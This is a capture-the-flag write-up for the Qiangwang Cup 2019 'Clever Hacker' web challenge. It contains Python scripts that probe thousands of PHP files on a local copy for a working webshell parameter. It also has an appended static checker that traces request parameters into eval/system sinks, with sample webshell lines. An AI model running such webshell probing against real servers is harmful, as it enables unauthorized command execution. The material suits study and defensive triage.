BUUCTF WEB [強網杯 2019] 高明的黑客 (Qiangwang Cup 2019: Clever Hacker)
Open the page and there is a hint: the source code can be downloaded.
Download the source and there are 3002 files. Looking through them, there are quite a few shells???
But none of them work. The real task of this challenge is to find the shell that does work, so what is being tested is probably script-writing ability!!
With the source downloaded, set up a local environment: PHP 7.0 or above, otherwise you get syntax errors!
Then write a script (extremely slow):
import requests
import os

url = "http://127.0.0.1/src/"
src_dir = "C://Users//Administrator//Desktop//www//src"
files = os.listdir(src_dir)
#print(files)

def GetGet(file):
    # Collect every parameter name this file reads through $_GET['...']
    a = []
    with open(os.path.join(src_dir, file), 'r') as f:
        content = f.readlines()
    for i in content:
        # str.find() returns -1 when absent, so the test must be >= 0
        if i.find("$_GET['") >= 0:
            start = i.find("$_GET['") + 7
            end = i.find("'", start)
            a.append(i[start:end])
    return a

def GetPost(file):
    # Same as GetGet, but for $_POST['...']
    a = []
    with open(os.path.join(src_dir, file), 'r') as f:
        content = f.readlines()
    for i in content:
        if i.find("$_POST['") >= 0:
            start = i.find("$_POST['") + 8
            end = i.find("'", start)
            a.append(i[start:end])
    return a

def Send():
    # Probe every candidate parameter of every file against the local copy
    # and report the one whose echo output actually comes back
    for i in files:
        get = GetGet(i)
        print("Try filename: %s" % i)
        for j in get:
            NewUrl = url + "%s?%s=%s" % (i, j, 'echo "Success!!!"')
            s = requests.get(NewUrl)
            if "Success" in s.text:
                print("Success! Get:%s" % j)
                break
        post = GetPost(i)
        for j in post:
            NewUrl = url + "%s" % i
            s = requests.post(NewUrl, data={j: "echo 'Success!!'"})
            if "Success" in s.text:
                print("Success! Post:%s" % j)
                break

Send()
This script is garbage; it would probably take a whole day to run... too weak, so I dropped it.
But I did not know how to do multithreading either??? Cried!!! Searched for Python 3 multithreading and changed it to this:
import requests
import os
import threading

url = "http://127.0.0.1/src/"
src_dir = "C://Users//Administrator//Desktop//www//src"
files = os.listdir(src_dir)
#print(files)

def GetGet(file):
    # Collect every parameter name this file reads through $_GET['...']
    a = []
    with open(os.path.join(src_dir, file), 'r') as f:
        content = f.readlines()
    for i in content:
        # str.find() returns -1 when absent, so the test must be >= 0
        if i.find("$_GET['") >= 0:
            start = i.find("$_GET['") + 7
            end = i.find("'", start)
            a.append(i[start:end])
    return a

def GetPost(file):
    # Same as GetGet, but for $_POST['...']
    a = []
    with open(os.path.join(src_dir, file), 'r') as f:
        content = f.readlines()
    for i in content:
        if i.find("$_POST['") >= 0:
            start = i.find("$_POST['") + 8
            end = i.find("'", start)
            a.append(i[start:end])
    return a

def Send(start, end):
    # Each thread probes its own slice files[start:end]
    for i in range(start, end):
        i = files[i]
        get = GetGet(i)
        print("Try filename: %s" % i)
        for j in get:
            NewUrl = url + "%s?%s=%s" % (i, j, 'echo "Success!!!"')
            s = requests.get(NewUrl)
            if "Success" in s.text:
                print("Success! Url:%s" % NewUrl)
                break
        post = GetPost(i)
        for j in post:
            NewUrl = url + "%s" % i
            s = requests.post(NewUrl, data={j: "echo 'Success!!'"})
            if "Success" in s.text:
                print("Success! Post:%s" % j)
                break

class myThread(threading.Thread):
    def __init__(self, threadID, start, end):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.start_idx = start
        self.end_idx = end
    def run(self):
        Send(self.start_idx, self.end_idx)

# 20 files per thread; the last chunk is clipped to len(files) so every file is
# covered (a fixed 150 x 20 = 3000 would skip the last two of the 3002 files)
CHUNK = 20
for i in range(0, (len(files) + CHUNK - 1) // CHUNK):
    thread = myThread(i, i * CHUNK, min((i + 1) * CHUNK, len(files)))
    thread.start()
It ran for about 20-odd minutes and gave:
Go straight to command execution!!
Finally got the flag:
Did my best; I could only get the time down to 20-odd minutes...
If any expert knows a faster way, please point it out... much appreciated!!!
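As an added example that is not part of the original writeup: instead of sending a request for every parameter, a static pass over the PHP source can tell which request parameters actually reach a code- or command-execution sink, which is also how a defender would triage a directory full of suspected webshells. The sink list, the regexes and the sample file below are assumptions constructed for this example, not code from the challenge.

```python
import re
from typing import Dict, List, Tuple

# PHP functions that execute code or shell commands: the sinks a webshell needs.
SINKS = ("eval", "assert", "system", "exec", "shell_exec", "passthru", "popen")
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST)\[\s*['\"][^'\"]+['\"]\s*\]"
SG_PARTS = re.compile(r"\$_(GET|POST|REQUEST)\[\s*['\"]([^'\"]+)['\"]")
ASSIGN = re.compile(r"(\$\w+)\s*=(?!=)\s*(.+)")          # $v = <expr>
UNSET = re.compile(r"\bunset\(\s*(\$\w+)")
SINK_CALL = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(\s*(" + SUPERGLOBAL + r"|\$\w+)")

def find_tainted_sinks(php_source: str) -> List[Tuple[str, str, str]]:
    """Return (sink, method, parameter) for every sink call whose argument is a
    request parameter, written inline or copied into a variable. Any assignment
    that mentions $_GET/$_POST/$_REQUEST taints the variable (over-approximates);
    a later plain assignment or unset() clears it, which rules out decoy shells."""
    taint: Dict[str, Tuple[str, str]] = {}
    hits: List[Tuple[str, str, str]] = []
    for stmt in re.split(r"[;\n]", php_source):      # one PHP statement at a time
        for var in UNSET.findall(stmt):
            taint.pop(var, None)
        for var, expr in ASSIGN.findall(stmt):
            sg = SG_PARTS.search(expr)
            if sg:
                taint[var] = (sg.group(1), sg.group(2))
            else:
                taint.pop(var, None)               # overwritten with something else
        for sink, arg in SINK_CALL.findall(stmt):
            sg = SG_PARTS.search(arg)
            if sg:
                hits.append((sink, sg.group(1), sg.group(2)))
            elif arg in taint:
                hits.append((sink, *taint[arg]))
    return hits

# Constructed sample in the style of the challenge files: only $Amk and the inline $_POST['zero'] reach a sink.
SAMPLE_PHP = """<?php
$Amk = $_GET['Amk'];
$xpJ = $_POST['xpJ'];
$yWt = $_GET['yWt'];
unset($xpJ);
$yWt = 'static';
system($Amk);
echo strlen($_REQUEST['len']);
eval($_POST['zero']);
"""

if __name__ == "__main__":
    print(find_tainted_sinks(SAMPLE_PHP))
```

Run over the 3002 files with os.listdir as in the scripts above, only the files that return a non-empty list need any further look, and no requests are sent at all.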